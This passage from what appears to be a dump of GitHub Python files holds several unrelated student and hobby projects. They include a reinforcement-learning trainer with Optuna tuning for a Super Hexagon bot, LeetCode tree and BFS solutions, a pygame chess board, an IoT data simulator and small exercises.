state_struct[\"player_pos\"] * state_struct[\"n_slots\"] \n        return (pos % 1.0) * 2.0 - 1.0\n\n\n# Adapted from https://github.com/DLR-RM/rl-baselines3-zoo/blob/master/rl_zoo3/wrappers.py\nclass HistoryWrapper(gym.Wrapper):\n    \"\"\"\n    Stack past observations and actions to give a history to the agent.\n    :param env:\n    :param horizon: Number of steps to keep in the history.\n    \"\"\"\n\n    def __init__(self, env: gym.Env, horizon: int = 2):\n        horizon = env.hparams.get(\"horizon\", horizon)\n        \n        # Overwrite the observation space\n        input_size = INPUT_SIZE + (INPUT_SIZE + 1) * horizon\n        env.observation_space = gym.spaces.Box(low=-np.inf, high=np.inf, shape=(input_size,))\n        \n        super().__init__(env)\n\n        self.horizon = horizon\n        self.obs_history = np.zeros(INPUT_SIZE * (horizon + 1))\n        self.action_history = np.zeros(horizon)\n\n    def _create_obs_from_history(self):\n        return np.concatenate((self.obs_history, self.action_history))\n\n    def reset(self):\n        # Flush the history\n        self.obs_history[...] = 0\n        self.action_history[...] 
= 0\n obs = self.env.reset()\n obs = np.array(obs)\n self.obs_history[..., -obs.shape[-1] :] = obs\n return self._create_obs_from_history()\n\n def step(self, action):\n obs, reward, done, info = self.env.step(action)\n obs = np.array(obs)\n action = np.array(action)\n last_ax_size = obs.shape[-1]\n\n self.obs_history = np.roll(self.obs_history, shift=-last_ax_size, axis=-1)\n self.obs_history[..., -obs.shape[-1] :] = obs\n\n self.action_history = np.roll(self.action_history, shift=-1, axis=-1)\n self.action_history[..., -1:] = action\n return self._create_obs_from_history(), reward, done, info\n\n\nclass TensorboardCallback(BaseCallback):\n def _on_training_start(self):\n # Save reference to tensorboard formatter object\n output_formats = self.logger.output_formats\n self.tb_formatter = next(formatter for formatter in output_formats if isinstance(formatter, TensorBoardOutputFormat))\n\n # TODO https://stable-baselines3.readthedocs.io/en/master/guide/tensorboard.html#logging-hyperparameters\n env_params = self.training_env.get_attr(\"hparams\")[0]\n model_params = self.model._hparams\n self.tb_formatter.writer.add_text(\"params/model\", str(model_params), self.num_timesteps)\n self.tb_formatter.writer.add_text(\"params/env\", str(env_params), self.num_timesteps)\n\n def _on_step(self) -> bool:\n is_episode_done = self.locals[\"dones\"][0]\n if is_episode_done:\n scores = self.training_env.get_attr(\"real_episode_scores\")[0]\n self.tb_formatter.writer.add_scalar(\"Score/Score vs episode\", scores[-1], len(scores))\n self.tb_formatter.writer.add_scalar(\"Score/Time vs episode\", scores[-1] / 60, len(scores))\n self.logger.record(\"Score/Score vs steps\", scores[-1])\n return True\n\n\nclass SavePlotCallback(BaseCallback):\n def __init__(self, save_path: str, verbose: int = 0):\n super().__init__(verbose)\n self.save_path = pathlib.Path(save_path)\n\n def _on_training_start(self):\n self.save_path.mkdir(parents=True, exist_ok=True)\n\n def _on_step(self) -> bool:\n def plot(ax, data):\n ax.set_title(\"Q-learning score history\")\n x = np.array(data) / 60 # Seconds\n ax.set_ylabel('Time [s]')\n ax.set_xlabel('Attempt number')\n ax.plot(x)\n ax.plot(moving_average(x, k=10))\n\n score_history = self.training_env.get_attr(\"real_episode_scores\")[0]\n path = self.save_path / f\"{self.num_timesteps}.png\"\n fig, ax = plt.subplots()\n plot(ax, score_history)\n fig.savefig(path)\n plt.close(fig)\n return True\n\n\nclass CheckpointWithEnvCallback(CheckpointCallback):\n def _on_step(self) -> bool:\n # Save env variables by adding them as model variables so they get saved\n real_episode_scores = self.training_env.get_attr(\"real_episode_scores\")[0]\n hparams = self.training_env.get_attr(\"hparams\")[0]\n self.model._env_real_episode_scores = real_episode_scores\n self.model._env_hparams = hparams\n return super()._on_step()\n\n\nclass SupaSB3:\n def __init__(self, experiment_name=\"sb3_21\"):\n self.experiment_name = experiment_name\n \n self.model_class = QRDQN # DQN, PPO\n\n sb3_params = dict(\n train_freq=8,\n gradient_steps=-1,\n gamma=0.99,\n exploration_fraction=0,\n exploration_final_eps=0,\n target_update_interval=1000,\n learning_starts=10000,\n buffer_size=100_000,\n batch_size=128,\n learning_rate=6.516183998165423e-05,\n policy_kwargs=dict(net_arch=[256, 256])\n )\n # PPO\n # sb3_params = dict(\n # n_steps = 1024,\n # batch_size = 64,\n # gae_lambda = 0.98,\n # gamma = 0.95,\n # n_epochs = 4,\n # ent_coef = 0.01,\n # )\n\n self.total_timesteps = 2_000_000\n self.horizon = 2 # Stack this 
many states into one\n\n # The model works with indices [0, 3), but the server expects [-1,0,1].\n self.actions_tr = [-1, 0, 1] # Map action index to action\n self.actions_tr_inv = { v: i for i, v in enumerate(self.actions_tr) }\n\n checkpoint_path = f\"./checkpoints/{self.experiment_name}\"\n checkpoint_callback = CheckpointWithEnvCallback(\n save_freq=50_000, # steps\n save_path=checkpoint_path,\n name_prefix=self.experiment_name,\n save_replay_buffer=True,\n save_vecnormalize=True,\n verbose=2\n )\n save_plot_callback_ = SavePlotCallback(save_path=checkpoint_path)\n save_plot_callback = EveryNTimesteps(n_steps=checkpoint_callback.save_freq, callback=save_plot_callback_)\n\n self.callbacks = [\n TensorboardCallback(),\n checkpoint_callback,\n save_plot_callback\n ]\n\n env = SupaEnv()\n self.env = HistoryWrapper(env, horizon=self.horizon)\n if not self.load_checkpoint(checkpoint_path):\n self.model = self.model_class(\n \"MlpPolicy\", # CustomDQNPolicy\n self.env,\n **sb3_params,\n verbose=2,\n tensorboard_log=f\"runs/{self.experiment_name}\",\n seed=42)\n self.model._hparams = sb3_params # Store params for easy logging and saving\n self.learn_thread = None \n\n self.last_action = None\n\n def on_episode_end(self, score=None):\n if self.learn_thread and self.learn_thread.is_alive():\n env_queue.put((GAME_OVER_FLAG, score))\n self.last_action = None\n\n def get_action(self, state):\n action = None\n env_queue.put((ENV_STATE_FLAG, state))\n if self.learn_thread and self.learn_thread.is_alive():\n try:\n action = action_queue.get(timeout=15)\n except queue.Empty:\n # This should happen only when the total timesteps is reached (learning has stopped)\n print(\"action_queue timeout\") \n if action is None: # When not learning \n if self.last_action is None:\n state = self.env.reset()\n else:\n state, *_ = self.env.step(self.last_action)\n action_queue.get() # Empty out the queue (== self.last_action)\n action, _ = self.model.predict(state, deterministic=True)\n \n self.last_action = action\n action = self.actions_tr[action]\n return action\n\n def set_is_learning(self, is_learning):\n def learn_worker():\n self.model.learn(\n total_timesteps=self.total_timesteps - self.model.num_timesteps, \n log_interval=10, # Log every n episodes \n reset_num_timesteps=False, \n callback=self.callbacks)\n print(\"Learning complete!\")\n\n if is_learning:\n if self.learn_thread is None or not self.learn_thread.is_alive():\n self.learn_thread = threading.Thread(target=learn_worker)\n self.learn_thread.start()\n else:\n if self.learn_thread:\n if self.learn_thread.is_alive():\n env_queue.put((KYS_FLAG, None))\n self.learn_thread.join()\n self.learn_thread = None\n\n def load_checkpoint(self, checkpoint_path):\n # Resume latest checkpoint\n path = latest_checkpoint(checkpoint_path)\n if path is None:\n return False\n\n model_path, replay_buffer_path = path\n self.model = self.model_class.load(model_path, env=self.env, print_system_info=True)\n if replay_buffer_path:\n self.model.load_replay_buffer(replay_buffer_path)\n\n # Restore manually saved env variables\n self.env.env.real_episode_scores = self.model._env_real_episode_scores\n self.env.env.hparams = self.model._env_hparams\n self.model.set_env(self.env)\n\n return True \n\n\n\nimport optuna\nimport optuna.visualization as opt_vis\n\n\nclass OptunaTrialCallback(BaseCallback):\n def __init__(self, trial: optuna.Trial, eval_freq: int, verbose: int = 0):\n super().__init__(verbose)\n\n self.eval_freq = eval_freq\n self.trial = trial\n self.last_n_mean = 50\n 
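# the score reported to Optuna is the median over this many recent episodes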
\n self.is_pruned = False\n\n def _on_step(self) -> bool:\n # if self.num_timesteps > 40_000:\n # # Prune if the run is absolute garbage (worse than random)\n # scores = self.training_env.get_attr(\"real_episode_scores\")[0]\n # score = np.median(scores[-min(len(scores), self.last_n_mean):])\n # if score < 3 * 60:\n # self.is_pruned = True\n # return False\n if self.num_timesteps % self.eval_freq == 0:\n scores = self.training_env.get_attr(\"real_episode_scores\")[0]\n score = np.median(scores[-min(len(scores), self.last_n_mean):])\n self.trial.report(score, self.num_timesteps)\n if self.trial.should_prune():\n self.is_pruned = True\n return False\n return True\n\n\ndef sample_dqn_params(trial: optuna.Trial) -> Dict[str, Any]:\n gamma = trial.suggest_categorical(\"gamma\", [0.9, 0.95, 0.97, 0.99])\n learning_rate = trial.suggest_float(\"learning_rate\", 1e-5, 1, log=True)\n # batch_size = trial.suggest_categorical(\"batch_size\", [16, 32, 64, 128, 256, 512])\n batch_size = 128\n # buffer_size = trial.suggest_categorical(\"buffer_size\", [int(1e4), int(5e4), int(1e5)])\n buffer_size = 100_000\n\n exploration_fraction = 0\n exploration_final_eps = 0\n\n # exploration_final_eps = trial.suggest_float(\"exploration_final_eps\", 0, 0.1)\n # exploration_fraction = trial.suggest_float(\"exploration_fraction\", 0, 0.5)\n target_update_interval = trial.suggest_categorical(\"target_update_interval\", [300, 1000, 5000, 10000])\n\n # train_freq = trial.suggest_categorical(\"train_freq\", [1, 8, 16])\n # subsample_steps = trial.suggest_categorical(\"subsample_steps\", [1, 2])\n # gradient_steps = max(train_freq // subsample_steps, 1)\n train_freq = 8\n gradient_steps = -1\n\n # net_arch = trial.suggest_categorical(\"net_arch\", [\"tiny\", \"small\", \"medium\"])\n net_arch = \"medium\"\n net_arch = {\"tiny\": [64], \"small\": [64, 64], \"medium\": [256, 256]}[net_arch]\n\n hyperparams = {\n \"gamma\": gamma,\n \"learning_rate\": learning_rate,\n \"batch_size\": batch_size,\n \"buffer_size\": buffer_size,\n \"train_freq\": train_freq,\n \"gradient_steps\": gradient_steps,\n \"exploration_fraction\": exploration_fraction,\n \"exploration_final_eps\": exploration_final_eps,\n \"target_update_interval\": target_update_interval,\n \"learning_starts\": 5000,\n \"policy_kwargs\": dict(net_arch=net_arch),\n }\n return hyperparams\n\n\ndef sample_env_params(trial: optuna.Trial) -> Dict[str, Any]:\n reward_slot_center_amount = 0 # trial.suggest_float(\"reward_slot_center_amount\", 0, 1)\n reward_far_wall_amount = trial.suggest_float(\"reward_far_wall_amount\", 0, 1)\n # default_reward = trial.suggest_float(\"default_reward\", 0, 1)\n default_reward = 0.0\n # horizon = trial.suggest_categorical(\"horizon\", [0, 1, 2])\n horizon = 2\n\n hyperparams = {\n \"reward_slot_center\": False, # Receive reward for being close to the center of a slot\n \"reward_slot_center_amount\": reward_slot_center_amount,\n \"reward_far_wall\": True, # Receive reward for being on a slot where the wall is far away\n \"reward_far_wall_amount\": reward_far_wall_amount,\n \"reward_interval\": 60, # Receive interval_reward reward after this many successful steps\n \"interval_reward\": 0,\n \"default_reward\": default_reward, # Receive reward each step\n \"loss_reward\": -1, # Reward when game over\n \"horizon\": horizon, # Stack this many previous states together\n }\n return hyperparams\n\n\nclass SupaSB3Optuna:\n def __init__(self, experiment_name=\"optuna_qrdqn_1\"):\n self.experiment_name = experiment_name\n\n self.n_trials = 50\n 
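# total number of Optuna trials to run in this study\n        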
self.n_startup_trials = 3 # Pruning is disabled until the given number of trials finish in the same study.\n        self.eval_freq = 2000 # Report metrics to pruner every this many steps\n        self.total_timesteps = 50_000\n        self.n_warmup_steps = int(self.total_timesteps * 0.3) # Do not prune before 30% of the max budget is used\n\n        # The model works with indices [0, 3), but the server expects [-1,0,1].\n        self.actions_tr = [-1, 0, 1] # Map action index to action\n        self.actions_tr_inv = { v: i for i, v in enumerate(self.actions_tr) }\n\n        # A separate thread is used for listening to C++ requests and for optimization.\n        # Another option would be to make the gym.Env handle server requests instead.\n        self.learn_thread = threading.Thread(target=self.optimize_hyperparameters)\n        self.learn_thread.start()\n\n    def on_episode_end(self, score=None):\n        env_queue.put((GAME_OVER_FLAG, score))\n\n    def get_action(self, state):\n        env_queue.put((ENV_STATE_FLAG, state))\n        try:\n            action = action_queue.get(timeout=10)\n        except queue.Empty:\n            while not env_queue.empty():\n                env_queue.get_nowait()\n            env_queue.put((ENV_STATE_FLAG, state))\n            action = action_queue.get()\n        action = self.actions_tr[action]\n        return action\n\n    def set_is_learning(self, is_learning):\n        return\n\n    def optimize_hyperparameters(self):\n        print(\"Optimizing hyperparameters...\")\n\n        def objective(trial: optuna.Trial): \n            print(f\"Running trial {trial._trial_id} ...\")\n\n            env_params = sample_env_params(trial)\n            dqn_params = sample_dqn_params(trial)\n            print(env_params)\n            print(dqn_params)\n\n            env = SupaEnv(hparams=env_params)\n            env = HistoryWrapper(env)\n\n            model = QRDQN(\n                \"MlpPolicy\",\n                env,\n                **dqn_params,\n                verbose=2,\n                # tensorboard_log=None,\n                tensorboard_log=f\"runs/{self.experiment_name}/{trial._trial_id}\",\n                seed=None)\n            model._hparams = dqn_params # Store params for easy logging and saving\n\n            trial_cb = OptunaTrialCallback(trial, eval_freq=self.eval_freq, verbose=2)\n            callbacks = [\n                TensorboardCallback(),\n                trial_cb\n            ]\n            model.learn(\n                total_timesteps=self.total_timesteps, \n                log_interval=10, # Log every n episodes \n                reset_num_timesteps=False, \n                callback=callbacks)\n            print(\"Learning complete!\")\n\n            model.save(f\"runs/{self.experiment_name}/{trial._trial_id}/model\")\n            \n            if trial_cb.is_pruned:\n                print(f\"Pruning trial {trial._trial_id}\")\n                raise optuna.exceptions.TrialPruned()\n\n            scores = env.env.real_episode_scores\n            score = np.mean(scores[-min(len(scores), trial_cb.last_n_mean):])\n            return score\n\n        sampler = optuna.samplers.TPESampler(n_startup_trials=self.n_startup_trials)\n        pruner = optuna.pruners.MedianPruner(n_startup_trials=self.n_startup_trials, n_warmup_steps=self.n_warmup_steps)\n\n        storage_path = f\"runs/{self.experiment_name}/{self.experiment_name}.db\"\n        storage_name = f\"sqlite:///{storage_path}\"\n        pathlib.Path(storage_path).parent.mkdir(exist_ok=True, parents=True)\n        study = optuna.create_study(sampler=sampler, pruner=pruner, direction=\"maximize\", study_name=self.experiment_name, storage=storage_name, load_if_exists=True)\n\n        # Start with a good initial guess\n        study.enqueue_trial({\n            \"gamma\": 0.97,\n            'learning_rate': 0.0008195333347828384,\n            'target_update_interval': 300,\n            'reward_far_wall_amount': 0.656756348802928\n        })\n        study.optimize(objective, n_trials=self.n_trials)\n\n        pruned_trials = study.get_trials(deepcopy=False, states=[optuna.trial.TrialState.PRUNED])\n        complete_trials = study.get_trials(deepcopy=False, states=[optuna.trial.TrialState.COMPLETE])\n\n        print(\"Study statistics: \")\n        print(\" Number of 
finished trials: \", len(study.trials))\n print(\" Number of pruned trials: \", len(pruned_trials))\n print(\" Number of complete trials: \", len(complete_trials))\n\n print(\"Best trial:\")\n trial = study.best_trial\n\n print(\" Value: \", trial.value)\n\n print(\" Params: \")\n for key, value in trial.params.items():\n print(\" {}: {}\".format(key, value))\n\n log_path = f\"runs/{self.experiment_name}/report\"\n print(f\"Writing report to {log_path}\")\n study.trials_dataframe().to_csv(f\"{log_path}.csv\")\n\n # Save python object to inspect/re-use it later\n with open(f\"{log_path}.pkl\", \"wb+\") as f:\n pickle.dump(study, f)\n\n # Plot optimization result\n try:\n fig1 = opt_vis.plot_optimization_history(study)\n fig2 = opt_vis.plot_param_importances(study)\n fig3 = opt_vis.plot_intermediate_values(study)\n fig4 = opt_vis.plot_parallel_coordinate(study)\n\n fig1.show()\n fig2.show()\n fig3.show()\n fig4.show()\n except (ValueError, ImportError, RuntimeError):\n pass\n\n print(\"Done optimizing hyperparameters!\")\n ","repo_name":"mare5x/SuperHaxagon","sub_path":"py/sb3_rl.py","file_name":"sb3_rl.py","file_ext":"py","file_size_in_byte":27041,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"71475619074","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def isSubtree(self, root: Optional[TreeNode], subRoot: Optional[TreeNode]) -> bool:\n if root == None:\n return False\n check = self.isSameTree(root, subRoot)\n if check == True:\n return True\n left_sub = self.isSubtree(root.left, subRoot)\n right_sub = self.isSubtree(root.right, subRoot)\n return left_sub or right_sub\n def isSameTree(self, p: Optional[TreeNode], q: Optional[TreeNode]) -> bool:\n if p == None or q==None:\n if p == q:\n return True\n else:\n return False\n if p.val == q.val:\n left_check = self.isSameTree(p.left, q.left)\n right_check = self.isSameTree(p.right, q.right)\n return left_check and right_check\n else:\n return False\n","repo_name":"KevinFan9729/coding-refresher","sub_path":"Subtree of Another Tree/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35467226503","text":"import requests\nimport argparse\nimport jsonpickle\nimport random\nimport tqdm\nfrom time import sleep\n\nparser = argparse.ArgumentParser(description='Send simulated data to a thingsIO account')\nparser.add_argument('--endpoint', default='http://34.120.7.225/store')\nparser.add_argument('--num', default=1000, type=int, help='number of simulated requests')\nparser.add_argument('--delay', default=1, type=int, help='delay in seconds per round')\nparser.add_argument('--schema_file', default=\"schema2.json\", help='path to the schema json')\nparser.add_argument('--uuid_file', default=\"uids.txt\", help='path to the uuids')\n\nargs = parser.parse_args()\n\nAPI_KEYS = []\nwith open(args.uuid_file, \"r\") as fp:\n API_KEYS = [i.rstrip() for i in fp.readlines()]\n\nURL = args.endpoint\nNUM_REQ = args.num\nSCHEMA = None\n\n\nwith open(args.schema_file, 'r') as fp:\n SCHEMA = jsonpickle.decode(fp.read())\n\nif SCHEMA is None:\n exit(-1)\n\ndef getRandom(s):\n if s == \"numeric\":\n return random.uniform(0,500)\n elif s == \"location\":\n return \"{},{}\".format(random.uniform(-85,85), random.uniform(-170,170))\n else:\n 
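# any other schema type falls back to an empty string\n        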
return \"\"\n\n\nheaders = {'content-type': 'application/json'}\n\nfor i in tqdm.trange(NUM_REQ):\n req = dict(SCHEMA)\n for k in SCHEMA.keys():\n req[k] = getRandom(SCHEMA[k][\"type\"])\n for u in API_KEYS:\n r = requests.post(\"{}/{}\".format(URL, u), data=jsonpickle.encode(req), headers=headers)","repo_name":"sanskarkatiyar/thingsIO","sub_path":"test/batch_sim.py","file_name":"batch_sim.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21738289771","text":"import pygame as pg\r\nimport chess_engine\r\n\r\nWIDTH = HEIGHT = 512\r\nDIMENSION = 8\r\nSQUARE_SIZE = HEIGHT // DIMENSION\r\nMAX_FPS = 15\r\nIMAGES = {}\r\n\r\n\r\ndef load_images():\r\n pieces = ['wp', 'wR', 'wN', 'wB', 'wK', 'wQ', 'bp', 'bR', 'bN', 'bB', 'bK', 'bQ']\r\n for piece in pieces:\r\n IMAGES[piece] = pg.image.load('images/' + piece + '.png'), (SQUARE_SIZE, SQUARE_SIZE) # set image size\r\n\r\n\r\n\"\"\" main function \"\"\"\r\n\r\n\r\ndef main():\r\n pg.init()\r\n # pygame documentation\r\n screen = pg.display.set_mode((HEIGHT, WIDTH))\r\n clock = pg.time.Clock()\r\n screen.fill(pg.Color('white'))\r\n gs = chess_engine.GameState()\r\n valid_moves = gs.get_valid_moves()\r\n move_made = False\r\n load_images()\r\n run_game = True\r\n sq_Selected = ()\r\n player_clicks = []\r\n while run_game:\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n run_game = False\r\n elif event.type == pg.MOUSEBUTTONDOWN:\r\n location = pg.mouse.get_pos() # x, y mouse location\r\n col = location[0] // SQUARE_SIZE # x\r\n row = location[1] // SQUARE_SIZE # y\r\n if sq_Selected == (row, col): # if user clicked the same square twice\r\n sq_Selected = () # deselect square\r\n player_clicks = []\r\n else:\r\n sq_Selected = (row, col)\r\n player_clicks.append(sq_Selected)\r\n if len(player_clicks) == 2:\r\n move = chess_engine.Move(player_clicks[0], player_clicks[1], gs.board)\r\n print(move.get_chess_notation())\r\n # if move in valid_moves:\r\n for each in range(len(valid_moves)):\r\n if move == valid_moves[each]:\r\n gs.make_move(move)\r\n move_made = True\r\n sq_Selected = ()\r\n player_clicks = []\r\n if not move_made:\r\n player_clicks = [sq_Selected]\r\n\r\n elif event.type == pg.KEYDOWN:\r\n if event.key == pg.K_z:\r\n gs.undo_move()\r\n move_made = True\r\n if move_made:\r\n valid_moves = gs.get_valid_moves()\r\n move_made = False\r\n\r\n drawGameState(screen, gs)\r\n clock.tick(MAX_FPS)\r\n pg.display.flip()\r\n\r\n\r\n\"\"\" Draw board and pieces \"\"\"\r\n\r\n\r\ndef drawGameState(screen, gs):\r\n drawboard(screen)\r\n drawpieces(screen, gs.board)\r\n\r\n\r\ndef drawboard(screen):\r\n colors = [pg.Color('white'), pg.Color('brown')]\r\n for row in range(DIMENSION):\r\n for column in range(DIMENSION):\r\n color = colors[((row + column) % 2)]\r\n pg.draw.rect(screen, color, pg.Rect(row * SQUARE_SIZE, column * SQUARE_SIZE, SQUARE_SIZE, SQUARE_SIZE))\r\n\r\n\r\ndef drawpieces(screen, board):\r\n for row in range(DIMENSION):\r\n for column in range(DIMENSION):\r\n piece = board[column][row]\r\n if piece != '--':\r\n pg_rect = pg.Rect(row * SQUARE_SIZE, column * SQUARE_SIZE, SQUARE_SIZE, SQUARE_SIZE)\r\n screen.blit(IMAGES[piece][0], pg_rect)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"bazuly/ChessGame","sub_path":"chess_main.py","file_name":"chess_main.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
+{"seq_id":"72565685314","text":"'''\n\nDescription:\n\nIn a given grid, each cell can have one of three values:\n\nthe value 0 representing an empty cell;\nthe value 1 representing a fresh orange;\nthe value 2 representing a rotten orange.\nEvery minute, any fresh orange that is adjacent (4-directionally) to a rotten orange becomes rotten.\n\nReturn the minimum number of minutes that must elapse until no cell has a fresh orange. If this is impossible, return -1 instead.\n\n \n\nExample 1:\n\nInput: [[2,1,1],[1,1,0],[0,1,1]]\nOutput: 4\n\n\n\nExample 2:\n\nInput: [[2,1,1],[0,1,1],[1,0,1]]\nOutput: -1\nExplanation: The orange in the bottom left corner (row 2, column 0) is never rotten, because rotting only happens 4-directionally.\n\n\n\nExample 3:\n\nInput: [[0,2]]\nOutput: 0\nExplanation: Since there are already no fresh oranges at minute 0, the answer is just 0.\n \n\nNote:\n\n1 <= grid.length <= 10\n1 <= grid[0].length <= 10\ngrid[i][j] is only 0, 1, or 2.\n\n'''\n\n\nfrom typing import List\nfrom collections import deque\n\nclass Solution:\n def orangesRotting(self, grid: List[List[int]]) -> int:\n \n # Constant for grid state\n EMPTY = 0\n FRESH = 1\n ROTTEN = 2\n \n # Get dimension of grid\n h, w = len(grid), len(grid[0])\n \n # record for fresh oranges\n fresh_count = 0\n \n # record for position of initial rotten oranges\n rotten_grid = [] \n \n for y in range(h):\n for x in range(w):\n \n if grid[y][x] == FRESH :\n fresh_count += 1\n \n elif grid[y][x] == ROTTEN:\n rotten_grid.append( (y, x, 0) )\n \n \n if fresh_count == 0:\n # Quick response for no fresh organe\n return 0\n \n \n traversal_queue = deque( rotten_grid )\n \n # Launch BFS from rotten grid\n while traversal_queue:\n \n cur_y, cur_x, time_stamp = traversal_queue.popleft()\n \n if 0 <= cur_y < h and 0 <= cur_x < w and grid[cur_y][cur_x] in (FRESH, ROTTEN):\n \n if grid[cur_y][cur_x] == FRESH:\n \n # This orange is rotten on current iteration\n # update fresh count\n fresh_count -= 1\n\n # Mark as visited with time stamp\n grid[cur_y][cur_x] = -time_stamp\n\t\t\t\t \n\t\t\t\t\t# update minute\n minute = time_stamp\n \n if ( grid[cur_y][cur_x] < 0 ) or ( time_stamp == 0 ):\n \n # BFS with new time stamp\n traversal_queue.append( (cur_y-1, cur_x, time_stamp+1) )\n traversal_queue.append( (cur_y+1, cur_x, time_stamp+1) )\n traversal_queue.append( (cur_y, cur_x-1, time_stamp+1) )\n traversal_queue.append( (cur_y, cur_x+1, time_stamp+1) )\n \n # ----------------------------------------------------------------\n \n if fresh_count == 0:\n # All orange is rotten finally\n return minute\n else:\n # Some orange still keep fresh\n return -1\n \n\n\n# m : the height of grid\n# n : the width of grid\n\n## Time Complexity: O( m*n )\n#\n# The overhead in time is the cost of BFS traversal, which is of O( m*n )\n\n## Space Complexity: O( m*n )\n#\n# The overhead in space is the storage for traversal queue, which is of O( m*n )\n\nfrom collections import namedtuple\nTestEntry = namedtuple('TestEntry', 'grid')\n\ndef test_bench():\n\n test_data = [\n TestEntry( grid = [[2,1,1],[1,1,0],[0,1,1]] ),\n TestEntry( grid = [[2,1,1],[0,1,1],[1,0,1]] ),\n TestEntry( grid = [[0,2]] ),\n TestEntry( grid = [[1,2,2]] ),\n TestEntry( grid = [[1,1,1,1],[2,1,1,2],[1,1,1,1]] ),\n ]\n\n # expected output:\n '''\n 4\n -1\n 0\n 1\n 2\n '''\n\n for t in test_data:\n\n print( Solution().orangesRotting( grid = t.grid ) )\n \n return\n\n\n\n\nif __name__ == '__main__':\n\n test_bench() \n\n","repo_name":"brianchiang-tw/leetcode","sub_path":"No_0994_Rotting 
Oranges/by_bfs.py","file_name":"by_bfs.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"10644164744","text":"# Program Name: Cities\n# Program Author: James Allen\n# Class: Computer Programming ITSE 1302 7P1\n# Description: This program populates a list a sorts descending\n# declare list\ncity = []\n# loop populating the list with setinel control\nname = input(\"Enter City Name: \")\nwhile name != \"XXX\":\n\tcity.append(name)\n\tname = input(\"Enter City Name: \")\n# sort the list descending\ncity.sort(reverse=True)\nprint(\"Sorted Cities (descending): \")\n# print list elements individually\nfor x in city:\n\tprint(x)","repo_name":"jallen128652/Python","sub_path":"Module6/Cities/Cities/Cities.py","file_name":"Cities.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31960104041","text":"\"\"\"\nFile: coin_flip_runs.py\nName: Chance\n-----------------------\nThis program should simulate coin flip(s)\nwith the number of runs input by users.\nA 'run' is defined as consecutive results\non either 'H' or 'T'. For example, 'HHHHHTHTT'\nis regarded as a 2-run result.\nYour program should stop immediately after your\ncoin flip results reach the number of runs!\n\"\"\"\n\nimport random as r\n\n\ndef main():\n\t\"\"\"\n\t(1) end_runs is end condition\n\t(2) random string and meet our end condition\n\t(3) print random string\n\t\"\"\"\n\tprint(\"Let;s flip a coin!\")\n\tend_runs = int(input('Number of runs: '))\n\n\t# Initial Condition\n\truns = 0\n\ton_check = 0\n\tpre_coin = 2\n\tans = ''\n\n\twhile True:\n\t\t# random coin 0/1\n\t\tcoin = r.randrange(0, 2)\n\n\t\t# ans\n\t\tif coin:\n\t\t\tans += 'H'\n\t\telse:\n\t\t\tans += 'T'\n\n\t\t# runs\n\t\tif coin == pre_coin:\n\t\t\tif not on_check:\n\t\t\t\truns += 1\n\t\t\t\ton_check = 1\n\t\telse:\n\t\t\ton_check = 0\n\t\tpre_coin = coin\n\n\t\t# EXIT\n\t\tif runs == end_runs:\n\t\t\tbreak\n\tprint(ans)\n\n\n# ---- DO NOT EDIT CODE BELOW THIS LINE ---- #\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"cwchang18/StanCode","sub_path":"SC101/HW00/coin_flip_runs.py","file_name":"coin_flip_runs.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12274904613","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\nimport os\nimport json\nimport glob\n\ndata_dir = '../data'\nsave_dir = '../graph'\njson_dir = '../json'\n\ndef main():\n os.chdir(data_dir)\n filelists = glob.glob('*.csv')\n for file in filelists:\n if not os.path.isdir(file) and file[-4:]==\".csv\":\n csv2png(file)\n\ndef csv2png(file):\n df = pd.read_csv(file, index_col=0)\n for i, dat in df.iteritems():\n plt.scatter(df.index, dat, label = i)\n plt.title(file)\n plt.legend()\n plt.savefig(os.path.join(save_dir, file+\".\"))\n plt.close()\n\nif __name__ == '__main__':\n main()\n\ndef get_json_info():\n json_str = {\n 'test_name' : 'angular_profile',\n 'test_type' : 'verification',\n 'test_type' : 'Chiba',\n 'test_data' : '2020/01/01',\n 'test_result' : {\n 'result_type' : 'graph',\n 'x-vals' : getVals('xaxis'),\n 'y-vals' : getVals('yaxis'),\n 'x-label' : 'angle[deg]',\n 'y-label' : 'intensity[mV]'\n }\n }\n return json_str\n\n\ndef getVals(axis):\n os.chdir('/mnt/c/Users/yuya9/mylab/LED_Measurements/data/')\n data_dir = glob.glob('*.csv')\n NumF = 
len(data_dir)\n    xval = []\n    yval = []\n    for i in range(0, NumF):\n        cw_data = pd.read_csv(data_dir[i])\n        x_data = pd.Series(cw_data['deg'])\n        y_data = pd.Series(cw_data['cw'])\n        \n        for x, y in zip(x_data, y_data):\n            xval.append(x)\n            yval.append(y)\n    #string = f'{axis}'\n    if axis == 'xaxis':\n        return xval\n    elif axis == 'yaxis':\n        return yval\n    else:\n        raise ValueError(\"Argument should be 'xaxis' or 'yaxis'\")\n\ndef str_json_info():\n    json_str = get_json_info()\n    os.chdir('/mnt/c/Users/yuya9/mylab/LED_Measurements/data/')\n    data_dir = glob.glob('*.csv')\n    NumF = len(data_dir)\n    for i in range(0, NumF):\n        data_json = os.path.splitext(os.path.basename(data_dir[i]))[0]\n        with open(os.path.join(json_dir,data_json+'.json'), 'w') as f:\n            json.dump(json_str, f, indent=4)\n    print(\"JSON file is created.\")\n    print(json_str)\n\n    \nif __name__ == \"__main__\":\n    